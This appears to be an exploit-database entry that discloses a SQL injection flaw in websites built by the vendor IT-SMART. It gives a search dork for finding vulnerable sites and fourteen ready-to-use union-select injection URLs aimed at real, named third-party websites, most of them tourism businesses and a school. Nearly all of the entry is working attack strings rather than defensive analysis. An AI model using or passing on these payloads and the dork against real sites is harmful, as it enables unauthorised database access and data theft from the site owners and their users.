Design By IT-SMART SQL Injection

2016.05.24
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################### # # Exploit Title : Design By IT-SMART SQL Injection # # Exploit Author : Ashiyane Digital Security Team # # Dork : "Designed by: IT-SMART" inurl:id= # # Vendor Homepage : www.it-smart.biz # # Tested On : Win 8 / Mozilla Firefox # # Date : 2016.5.24 # #################################### # # Demo : # # http://www.asiainitiativecorp.com/home-descr.php?id=-2' /*!50000union*/ select 1,version(),3,4,5,6,7,8,9,10--+ # # http://www.bridgeoflifeschool.org/page-detail.php?id=-8 /*!50000union*/ select 1,2,3,4,5,6,version(),8-- - # # http://www.lavillamonaangkor.com/tour-detail.php?id=-4 /*!50000union*/ select 1,version(),3,4,5,6,7 -- - # # http://www.royalavatar-d.com/photo-gallery.php?id=-2 /*!50000union*/ select 1,2,3,4,version(),6-- - # # http://www.tasomhostel.com/information-detail.php?id=-6 /*!50000union*/ select 1,2,3,4,5,version(),7-- - # # http://www.tropicalbreezegh.com/tour-detail.php?id=5 and false /*!50000union*/ select 1,2,version(),4-- - # # http://www.myhomecambodia.com/special.php?id=-2 /*!50000union*/ select 1,2,3,version(),5 -- - # # http://www.cambodiabyprivatedriver.com/detail.php?id=-17 /*!50000union*/ select 1,2,3,4,5,6,7,version()-- - # # http://www.angkordriverty.com/att-sr.php?id=-1 /*!50000union*/ select 1,version(),3 -- - # # http://www.sihanoukvilleinvest.com/view-pages.php?id=-2 /*!50000union*/ select 1,2,version(),4,5,6,7,8,9 -- - # # http://www.tuktukangkortours.com/about-cam.php?id=-13 /*!50000union*/ select 1,2,3,4,5,6,version(),8-- - # # http://www.virangkortours.com/pack-detail.php?id=-8 /*!50000union*/ select 1,version(),3,4,5,6,7,8-- - # # http://angkortourservices.com/tour_package_detail.php?id=-11 /*!50000union*/ select 1,version(),3,4,5,6,7-- - # # http://www.rosanabroadway.com/star.php?id=-3 /*!50000union*/ select 1,2,version(),4,5,6,7-- - # # ,.... #################################### # SPT To : Mahdi.Hidden ,B14CK-SPID3R # Discovered by : Saeid_9n # Mail : nanutilos1986@gmail.com ##################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top